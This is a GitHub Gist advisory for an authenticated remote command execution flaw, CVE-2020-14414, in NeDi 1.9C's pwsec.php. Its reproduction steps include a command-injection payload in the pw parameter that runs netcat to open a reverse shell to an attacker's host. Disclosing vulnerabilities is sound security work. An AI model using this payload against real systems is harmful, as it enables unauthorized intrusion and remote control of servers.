Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
NeDi 1.9C Authenticated RCE (CVE-2020-14414)
NeDi 1.9C is vulnerable to Remote Command Execution. pwsec.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a pw parameter. (This can also be exploited via CSRF.)
Steps To Reproduce-:
> Login with the credential.
> Go to https://ip/pwsec.php.
> Insert any data in the first field then intercept the request.
> Insert this command (';nc ip port -e /bin/bash;') and start listener on port (Note we need to use ' (single quote)).
> You will be greeted with a shell.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.